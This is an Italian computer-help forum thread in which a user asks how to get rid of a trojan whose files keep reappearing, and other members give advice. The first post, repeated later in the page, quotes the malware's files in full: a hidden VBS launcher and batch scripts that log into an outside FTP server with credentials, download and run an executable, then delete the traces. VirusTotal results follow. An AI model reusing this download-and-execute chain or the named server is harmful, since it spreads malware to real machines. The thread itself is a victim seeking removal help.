trojan che continua a tornare

Cho · 10-02-2012, 21:07

da qualche giorno su c continuano ad apparire 5 files così chiamati:

a.bat
ff.bat
gz
run.vbs
aa.exe

ho comodo internet security ma tengo la protezione antivirus disabilitata perchè altrimenti il pc si blocca dopo poche ore... comunque comodo rileva lo stesso i file come infetti anche se disattivato e credo che li blocchi, però nonostante li cancelli continuano a tornare..

ecco cosa c'è dentro i file:

a.bat
--------------------------------------
del c:\run.vbs
del c:\a.bat
--------------------------------------

ff.bat
--------------------------------------
ftp -s:c:\gz
c:\aa.exe
del c:\gz
cmd /c c:\a.bat
del c:\ff.bat
--------------------------------------

gz
--------------------------------------
open f1tp.3322.org
f1t
f1t
binary
get b.exe c:\aa.exe
bye
--------------------------------------

run.vbs
--------------------------------------
CreateObject("WScript.Shell").Run "cmd /c c:\ff.bat",0
--------------------------------------

aa.exe invece è zero byte

qui ho trovato qualche informazione:

http://www.sophos.com/en-us/threat-c...-analysis.aspx

qualcuno ha idea di come rimuovere i files una volta per tutte?

Cho · 10-02-2012, 23:43

accedendo al sito ftp f1tp.3322.org si vedono 5 file:

b.bat
b.exe
b.exe-
b.exe.bak
b.exe100728

li ho scaricati e ho fatto analizzare b.exe- da virustotal con questi risultati:

Quote:

AhnLab-V3 - 20120210
AntiVir TR/Dldr.Ftp.AE 20120210
Antiy-AVL - 20120210
Avast - 20120210
AVG - 20120210
BitDefender Trojan.Generic.5091558 20120210
ByteHero - 20120210
CAT-QuickHeal - 20120210
ClamAV - 20120210
Commtouch - 20120210
Comodo Heur.Suspicious 20120210
DrWeb - 20120210
Emsisoft Trojan-Downloader.Win32.MAgent!IK 20120210
eSafe - 20120208
eTrust-Vet - 20120210
F-Prot - 20120209
F-Secure Trojan.Generic.5091558 20120210
Fortinet - 20120210
GData Trojan.Generic.5091558 20120210
Ikarus Trojan-Downloader.Win32.MAgent 20120210
Jiangmin Trojan/Agent.dlqz 20120210
K7AntiVirus - 20120210
Kaspersky - 20120210
McAfee Artemis!8797D868EE54 20120210
McAfee-GW-Edition Artemis!8797D868EE54 20120209
Microsoft - 20120210
NOD32 - 20120210
Norman W32/Suspicious_Gen2.HTZNN 20120210
nProtect Trojan.Generic.5091558 20120210
Panda - 20120210
Prevx - 20120210
Rising - 20120210
Sophos - 20120210
SUPERAntiSpyware - 20120206
Symantec - 20120210
TheHacker - 20120210
TrendMicro - 20120210
TrendMicro-HouseCall - 20120210
VBA32 - 20120210
VIPRE - 20120210
ViRobot - 20120210
VirusBuster Trojan.DL.Ftp!214WOfyAhv8 20120210

enigmista63 · 10-02-2012, 23:48

Ciao, da quanto vedo vi è poco da commentare hai il pc infetto, ma che senso ha tenere l'antivirus disabilitato e poi lamentarti che hai il pc pieno di virus, inizia ad attivare l'antivirus, fai una scansione in modalita' provvisoria ed elimina tutta la porcheria che l'antivirus trova, se l'antivirus blocca il pc cambialo, come pensi di risolvere altrimenti?

Cho · 16-02-2012, 17:22

ho installato malwarebytes e i file su c non compaiono più però ogni tanto arriva qualche avviso di ip bloccato da malwarebytes (più che altro in uscita) , dal whois sembrerebbero ip cinesi, moldavi o serbi

comunque la scansione di malwarebytes non rileva nulla

Riku · 16-02-2012, 20:47

Ciao, segui la Guida alla disinfezione http://www.hwupgrade.it/forum/showthread.php?t=1599737 e allega i log secondo le regole di sezione http://www.hwupgrade.it/forum/showthread.php?t=1751598

10-02-2012, 21:07	#1
Cho Member Iscritto dal: Mar 2008 Messaggi: 201	trojan che continua a tornare da qualche giorno su c continuano ad apparire 5 files così chiamati: a.bat ff.bat gz run.vbs aa.exe ho comodo internet security ma tengo la protezione antivirus disabilitata perchè altrimenti il pc si blocca dopo poche ore... comunque comodo rileva lo stesso i file come infetti anche se disattivato e credo che li blocchi, però nonostante li cancelli continuano a tornare.. ecco cosa c'è dentro i file: a.bat -------------------------------------- del c:\run.vbs del c:\a.bat -------------------------------------- ff.bat -------------------------------------- ftp -s:c:\gz c:\aa.exe del c:\gz cmd /c c:\a.bat del c:\ff.bat -------------------------------------- gz -------------------------------------- open f1tp.3322.org f1t f1t binary get b.exe c:\aa.exe bye -------------------------------------- run.vbs -------------------------------------- CreateObject("WScript.Shell").Run "cmd /c c:\ff.bat",0 -------------------------------------- aa.exe invece è zero byte qui ho trovato qualche informazione: http://www.sophos.com/en-us/threat-c...-analysis.aspx qualcuno ha idea di come rimuovere i files una volta per tutte?

10-02-2012, 23:48	#3
enigmista63 Senior Member Iscritto dal: Apr 2009 Messaggi: 702	Ciao, da quanto vedo vi è poco da commentare hai il pc infetto, ma che senso ha tenere l'antivirus disabilitato e poi lamentarti che hai il pc pieno di virus, inizia ad attivare l'antivirus, fai una scansione in modalita' provvisoria ed elimina tutta la porcheria che l'antivirus trova, se l'antivirus blocca il pc cambialo, come pensi di risolvere altrimenti?

16-02-2012, 17:22	#4
Cho Member Iscritto dal: Mar 2008 Messaggi: 201	ho installato malwarebytes e i file su c non compaiono più però ogni tanto arriva qualche avviso di ip bloccato da malwarebytes (più che altro in uscita) , dal whois sembrerebbero ip cinesi, moldavi o serbi comunque la scansione di malwarebytes non rileva nulla

16-02-2012, 20:47	#5
Riku Member Iscritto dal: Jun 2011 Messaggi: 202	Ciao, segui la Guida alla disinfezione http://www.hwupgrade.it/forum/showthread.php?t=1599737 e allega i log secondo le regole di sezione http://www.hwupgrade.it/forum/showthread.php?t=1751598

Strumenti
Mostra una versione stampabile Invia questa pagina per email